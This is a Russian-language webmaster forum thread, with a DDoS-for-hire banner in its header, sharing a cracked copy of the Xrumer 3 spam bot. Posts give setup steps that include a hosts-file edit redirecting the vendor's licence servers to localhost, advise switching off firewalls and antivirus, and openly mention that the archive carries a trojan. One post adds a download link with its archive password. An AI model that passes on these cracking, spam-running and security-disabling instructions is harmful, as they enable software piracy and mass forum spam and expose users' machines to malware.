Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


Xrumer 3


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 31

#1
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Readme:
1. во первых вам нужен денвер качаем тут denwer.ru/dis/latest..и незабудьте установить его ;-)
2. кидаете в папку home в денвере botmaster.ru и toplib.ru(есть в этом архиве)
3. запускаете денвер
4. идете в папку xfull и запускаете файл "xpymepPROEKT.exe"(выплывет окно с активацией просто отдвигаете его)
5. создаете проект, сохраняете его и кидаете в папку projects в демке, при этом удаляя все старые проекты. проект в папке должен быть один единственный
6. запускаете демку
7. выбераем базу ссылок и жмем "продолжить с последней позиции"
8. Радуемся


#2
akron

akron

    Байт

  • Members
  • Pip
  • 111 сообщений
не могу создать проект. что делать?

нажать трижды на кнопку "Details"  (она же "Подробности"). потом откроется меню редактирования поэктов

наже скрин возможно пригодится

Изображение

пришлось подправить так же C:\WINDOWS\system32\drivers\etc\host

теперь он имеет следуюший вид

Скрытый текст
127.0.0.1 localhost
127.0.0.1 botm*aster.ru
127.0.0.1 top*lib.ru
127.0.0.1 www.botm*aster.ru
127.0.0.1 www.top*lib.ru
127.0.0.1 botm*aster.net
127.0.0.1 botm*aster2.net
127.0.0.1 www.botm*aster2.net
127.0.0.1 www.botm*aster.net
127.0.0.1 216.19*5.49.207


а теперь самое интересное )) чето даже после всего проделанного он не работает. фууу...
А есть такие у кого заработал?
Поднимите руки!
Я плохого не посоветую!

#3
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
akron
Вот, как и обещал... вчера забыл просто ;)

Цитата

Эта сборка на 99% из поста "Хрумер рабочий ломанный кому" (оригиналом того что было в начале там и не пахнет уже) + дополнения для пробива из разных постов.
В архиве хрумер + содержимое папки home денвера для него. Связка 100% рабочая, посты остаются, линки в поле "ваш сайт" тоже. Для работы программы нужно отключить фаерволл (он дает блу скрин) и антивирусы (они мешают работать). Во время работы программы она часто скачивает хтмл страницы с вирями, но по опыту (когда рестартуешь компьютер и стартует антивирь) никаких вирей не цепляется. По крайней мере любой начинающий сеошник может купить себе винт на 10 гигов за 10 баксов, воткнуть туда винду под этот хрумер и грузиться с него "чисто для спама" предварительно отключив основной винт если боится потерять данные.

Цитата

Мини FAQ (по письмам)
1) Проект создается любым хрумером который это делает (2.9 например), а в нем чтоб создать проект 3 раза кликаем на кнопку "подробно"
2) Это оригинальный "Хрумер рабочий ломанный кому" + замена файлов xas.txt и xas_AI.txt
Q. а за что отвечают файлы xas.txt и xas_AI.txt?
и еще вопросик, проверяет ли почту этот хрумер?

A. xas.txt файл это поля для заполнения основные xas_AI.txt поля для заполнения дополнительные (т.е. формы)
насчет почты не в курсе не использовал - экспериментируйте
3) Если хрумер сам собой закрывается - юзаем из архива "control.exe" в нем указываем путь к хрумеру. Кроме того нужно отрубить фаерволы ибо они мешпют хрумеру хрумать .


#4
akron

akron

    Байт

  • Members
  • Pip
  • 111 сообщений
Большое спасибо Админу за Хрумер все работает. Правда с трояном в архиве, но это решается установкой еще одной винды.

Первый Хрумер так же рабочий возможно дело в файлах для денвера или другого локального сервера. После замены с нового архива все заработало.  в первом архиве небыло папок botmaster2.net botmaster.net возможно дело в этом.
далее фаервол виндовса необходимо отключить и антивирус так же. (в папке троян + потом вы будете качать еще трояны с нета, :) антивирус будет мешать вас спамить :) выдавая сообщения о новом трояне в system32 )

И проверить ID: Номер базы ссылок по умолчанию стоит 40 а в папке Link id22. Это к примеру.
Вопрос с Хрумером решен. Спасибо.
Я плохого не посоветую!

#5
warlok

warlok

    Бит

  • Members
  • 8 сообщений
akron ты там поклацай по разным кнопкам оно появиться у мя тож когдато такая проблема была

#6
akron

akron

    Байт

  • Members
  • Pip
  • 111 сообщений
Я уже наклацал все работает.

Еще раз хочу заметить, что ставил я Хрумер на отдельный винт (потом уже :) ). Кроме Хрумера и Аллсабмитера там больше ничего нет.
До этого немного повыхватывал глюков, не буду утверждать, что это все из-за хрумера, так как одновременно устанавливал, с трояном букмаркинг демон (так и не нашел без трояна, а сперва обрадовался даже здесь хотел выложить).

Аваст отключился и появилось надпись на рабочем столе!  типа компьютер заражен трояном нажмите кнопку чтобы удалить их ))
Запустил с диска Hiren`s BOOT с его антивирусниками все поудалял. )  Потом только установил на новый винт винду...

Скрытый текст
Хочу предложить обмен базами. кому интересно пишите PM.

Я плохого не посоветую!

#7
PIAR

PIAR

    Бит

  • Members
  • 12 сообщений
Что то у меня совсем не катит. Даже запускаться не хочет(( У кого работат?

#8
HolyWanderer

HolyWanderer

    Бит

  • Members
  • 49 сообщений
а у меня вообще денвер не устанавливаеться после того, как я удалил прошлый apache дет 2006го года изза старого mysql. И не знаю что делать...

#9
Invasion

Invasion

    Бит

  • Members
  • 26 сообщений
Хмм, а этот хруммер обновляется?

#10
HolyWanderer

HolyWanderer

    Бит

  • Members
  • 49 сообщений
уже давно 4й есть в продаже.

#11
flatron

flatron

    Бит

  • Members
  • 33 сообщений
HolyWanderer видимо у тебя денвер удален не полностью читай внимательно ошибки которые он выдает, он все пишет что и как делать, если ты его уже устанавливал то ставь на другой диск и удали папку WebServer

p.s. в общем не тратьте свои силы на поиск взломанной Xrumer 4 её нету !!! я лично пользуюсь Xrumer 3 Gold edition и жалоб нету, кстати с ним в комплекте есть hrefer 2 выше версии тоже взломанной нету !!! вот так 4-ая стоит 450 $ поэтому я лучше подожду пока её взломают что думаю будет не скоро:good:

#12
HolyWanderer

HolyWanderer

    Бит

  • Members
  • 49 сообщений
еще сразу я и папку удалил и пробовал на другой диск и нифига.

#13
manhunt

manhunt

    Бит

  • Members
  • 16 сообщений
Если смотреть как ломали старые версии, то ИМХО 4 хрумак появится весной следующего года)

#14
HolyWanderer

HolyWanderer

    Бит

  • Members
  • 49 сообщений
запускаю я хрумер, проходит секунд 20, и пишет, что "нет соединения с сервером, невозможно подключиться к интернету", и сразу закрываеться программа(после нажатия "ок")
Что делать?

#15
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
HolyWanderer
Возможно фаервол рубит соединение ;) Отключи его или добавь хрумер в доверенные...

#16
HolyWanderer

HolyWanderer

    Бит

  • Members
  • 49 сообщений
я не использую фаерволы. Нод 32 только стоит, но на ск. я  знаю, он не матерится.

#17
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
HolyWanderer
Что за хрумер? де взял?

#18
HolyWanderer

HolyWanderer

    Бит

  • Members
  • 49 сообщений
ето из первой ссылки топика выдавал ошибку.
скачал со второй ]]>http://rapidshare.co...***/xz.rar.html]]>
пароль DsfregTher
и все нормально заработало, только кнопка "настройки" неактивна.
обьясни пожалуйста, почему(я еще не опытный)
------------14.08.08
пока все нормально работает. Разбираюсь.
------------
кто зареген на ]]>http://www.nulled.ws]]> давно и имеет там много сообщений, скачайте и выложите пожалуйста базы для хрумера

#19
3992990

3992990

    Бит

  • Members
  • 4 сообщений
ХРУМЕР работает - спасибо!

#20
Another

Another

    Бит

  • Banned
  • 4 сообщений
Не, боян... И без денвера найти не сложно... А вот 4???

#21
Graf_Drakula

Graf_Drakula

    Бит

  • Members
  • 39 сообщений
У меня лично не заработал(. По видимому придется покупать лицензию, или искать дальше.

#22
HolyWanderer

HolyWanderer

    Бит

  • Members
  • 49 сообщений
на нулледе есть, к-й без денвера пашет. (3)

#23
Nemo100

Nemo100

    Бит

  • Banned
  • 6 сообщений
Все работает как надо !

#24
akron

akron

    Байт

  • Members
  • Pip
  • 111 сообщений
УЖЕ 5 В ПРОДАЖЕ.

История изменений:
]]>http://www.botmaster.../index.php?p=24]]>

КОНЕЧНО проще купить. Это даже мне понятно :)

Что собственно скоро хочу сделать. Может Кто то Мне предложит скидку?? А? Баксов 200 Например.
Я плохого не посоветую!

#25
panikovskij

panikovskij

    Байт

  • Members
  • Pip
  • 55 сообщений
Тоисть из за трояна надобно ставить чистую систему на отдельный диск? :)


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных